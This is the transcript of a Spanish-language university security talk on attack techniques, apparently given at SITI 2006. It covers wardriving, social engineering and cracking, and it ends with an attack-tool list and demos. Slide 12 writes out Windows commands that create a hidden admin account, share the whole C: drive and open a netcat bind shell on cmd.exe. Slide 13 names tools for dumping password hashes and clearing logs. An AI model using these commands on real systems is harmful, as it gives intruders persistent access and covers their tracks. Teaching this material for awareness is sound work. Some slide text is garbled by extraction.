26 / 365 Ataque vs Defensa - Superar línea presión rival ...
Estrategias de Ataque y Defensa
-
Upload
securinfcom-seguridad-informatica -
Category
Technology
-
view
3.306 -
download
3
description
Transcript of Estrategias de Ataque y Defensa
![Page 1: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/1.jpg)
ESTRATEGIAS DE ATAQUE EN SEGURIDAD
INFORMATICA
Grupo de I+D en Tecnologías de la Información (GTI)
(Esp) Siler Amador [email protected]
http://gseguridad.unicauca.edu.co
![Page 2: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/2.jpg)
AGENDAHackers vs CrackersEl riesgo en la seguridad informáticaPérdidas económicas por ataques informáticosTécnicas de ataqueVectores de ataque a una redY si tienen la oportunidad…Caja de herramientas de ataque La próxima generación de Troyanos KeylogersDemo 1 (Ataque Masivo)Demo 2 (Defaced)… Y en la Unicauca que?Conclusiones
![Page 3: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/3.jpg)
HACKERS VS CRACKERS
HackersHackers
Asesoran
Asesoran
Etic
aEt
ica
Construyen
Construyen
CrackersCrackers
EgoEgoíístas
stas
Del
incu
ente
sD
elin
cuen
tes
Destruyen
Destruyen
![Page 4: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/4.jpg)
EL RIESGO EN LA SEGURIDAD INFORMÁTICA
![Page 5: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/5.jpg)
PÉRDIDAS POR ATAQUES CCS/FBI 2005
![Page 6: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/6.jpg)
PÉRDIDAS POR ATAQUES CCS/FBI 2005
$67.2 billones por año
$7.6 millones por hora
![Page 7: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/7.jpg)
TECNICAS DE ATAQUE
Wardriving: Nombre que recibe la búsqueda de redes inalámbricas para documentar su posición. Para realizar esta búsqueda se necesita como mínimo un equipo móvil (portátil) con tarjeta Wireless, y si queremos que la posición sea precisa, un GPS para pasar los datos a un mapa.
Objetivo: Conectarse al punto de acceso (AP) mal configurado e ingresar a la la red local de la empresa.
Herramientas:NetStumblerKismethttp://www.wardrive.net/wardriving/tools
![Page 8: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/8.jpg)
TECNICAS DE ATAQUE
Wardialing: Fue una técnica de los 80´s y 90´s, consitía en marcar repetidamente a modems y PBX´s disponibles en la red y de esta forma irrumpir a sistemas remotos.
Objetivo: Conectarse a modems o PBX´s mal configurados e ingresar a la la red local de la empresa.
Herramientas: THC-Scan 2.0ModemScanShokDial
![Page 9: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/9.jpg)
TECNICAS DE ATAQUE
Cracking: Modificar un programa para obtener beneficios. Normalmente se basa en quitar pantallas introductorias, protecciones o, como en unas modificaciones de cierto programa de comunicaciones, conseguir nuevos passwords de acceso a sistemas.
Objetivo:Tener acceso al software o a la red interna.
Herramientas:Las 100 mejores http://sectools.org/Inyección SQLXSS
![Page 10: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/10.jpg)
TECNICAS DE ATAQUE
Ing. Social: Persuadir a otra persona (a través de diversas formas) para que nos de un dato útil para cumplir un objetivo. Este dato puede ser un password, un código, etc. incluso pueden dar nombres de familiares y fechas importantes, que siempre se usan para formar claves.
Objetivo: Obtener información sensible que nos permita el acceso a la red.
Herramientas: TeléfonoMucha psicologíaInteligencia emocionalhttp://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
![Page 11: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/11.jpg)
VECTORES DE ATAQUE A UNA REDPuntos de acceso
INTE
RN
ETIN
TER
NET M
OD
EMM
OD
EMWIRELESSWIRELESS
FISICOFISICO
REDRED
WardrivingWardriving
Ing. SocialIng. Social
Wardialing
WardialingC
rack
ing
Cra
ckin
g
![Page 12: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/12.jpg)
Y si tienen la oportunidad…
Menos de 1 minuto es suficiente para:1. Crear una cuenta con privilegios de Admin!!!
1. Abrir la consola de comandos2. C:\net user cracker siti2006 /add3. C:\net localgroup administradores cracker /add
2. Compartir toda la unidad del disco!!!1. C:\net share siti2006=c:\ /remark:”Demo SITI2006”
3. Colocar un programa en escucha!!!1. http://gseguridad.unicauca.edu.co/nc.exe2. C:\WINNT\System32\nc.exe -d -L -p 55555 -e cmd.exe
![Page 13: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/13.jpg)
Caja de Herramientas de ataque en línea de comandos
fport.exe - shows open ports and the process that owns the portiplist.exe - enumerates the ip's of the computermd5.exe - gets the md5 hash of a filepw2kget.exe - for win2k gets the password of the currently logged on userpwreveal.exe - gets the passwords of any window that has a ****** editboxregshell.exe - a commandline registry explorer/editorsendmail.exe - a commandline email senderuptime.exe - gets the machines current uptimexwhois - advanced whois lookupScreencap.exe - makes a screenshot of the screen and saves it to screenshot.bmpCMDget.exe - Downloads a file from a website from user provided parameterswebscr.exe - creates a snapshot from the webcam and saves itshutd.exe - program that forces shutdown/reboot of machinebnc.exe - bnc for windows (see bnc.cfg)clslog.exe - clears app/security/system logs XP/NT/2k enum.exe - enumerates IPC$ share to collect informationwinfo.exe - enumerates IPC$ share to collect informationFTPd.exe - small ftp server for dos (see slimftpd.conf)Global.exe - process dos command on all disc/subdirsiislog.exe - clears IIS logsInfo.exe - gets system informationispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)nc.exe - netcatpv.exe - process manager for dosPwdump.exe - dumps SAM hashesscrnmode.exe - change screen mode from dosunrar.exe - unrar for doswget.exe - wget for windowswizmo.exe - command tool (see w.txt)dwpp.exe - dial up password graberwinrelay.exe - relay tcp/udp connectionsgetad.exe - escalate to admin user in w2kpipeup.exe - escalate to admin user in w2kdnsid - identify remore dns server
Agradecimientos a: NetrangerTomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
![Page 14: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/14.jpg)
LA PRÓXIMA GENERACION DE TROYANOS KEYLOGERS…
http://www.hispasec.com/laboratorio/troyano_video.htm
![Page 15: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/15.jpg)
DEMO1 - ATAQUE MASIVOEscenario
SITI 2006SITI 2006 LANLAN
ATACANTEATACANTE MAESTROMAESTRO
ZOMBIESZOMBIES
LinuxMetasploit
Scripts en Python
WindowsWin/XP/2K
http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
![Page 17: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/17.jpg)
... Y en la Unicauca que?
• Electiva de seguridad informática• Área de interés en seguridad informática del GTI. (Proyectos de tesis
de grado)• Legislación en comercio electrónico (Finalizado)• OBSES (Firewall Cluster Beowulf) (Finalizado)• INFORCE (Finalizado)• Antivirus-inteligente (En desarrollo)• Estudio de las tendencias predictivas sobre la escogencia de
contraseñas basado en redes bayesianas (En desarrollo)• Proyecto de Auditoría informática UNICAUCA • Publicaciones
PreocupaciPreocupacióón del departamento de sistemas de la FIET sobre n del departamento de sistemas de la FIET sobre la problemla problemáática de la seguridad de la informacitica de la seguridad de la informacióón.n.
![Page 18: Estrategias de Ataque y Defensa](https://reader031.fdocument.pub/reader031/viewer/2022020101/557ab88ed8b42a1e128b48df/html5/thumbnails/18.jpg)
CONCLUSIONESLos ataques de seguridad informática a nivel mundial son aislados? Inversión en guerra informática? ECHELON, ENFOPOL, CARNÍVORO…• USA• UK• CHINA• RUSIA
Los sistemas de seguridad actuales son reactivos y correctivos.• Preventivos• Inteligentes
Existen demasiadas herramientas de ataque gratis y disponibles en la red.Las técnicas de ataque cabian constantemente.Segun las estadísticas es muy probable que su sistema hayasido vulnerado y usted aún no lo sepa!!!.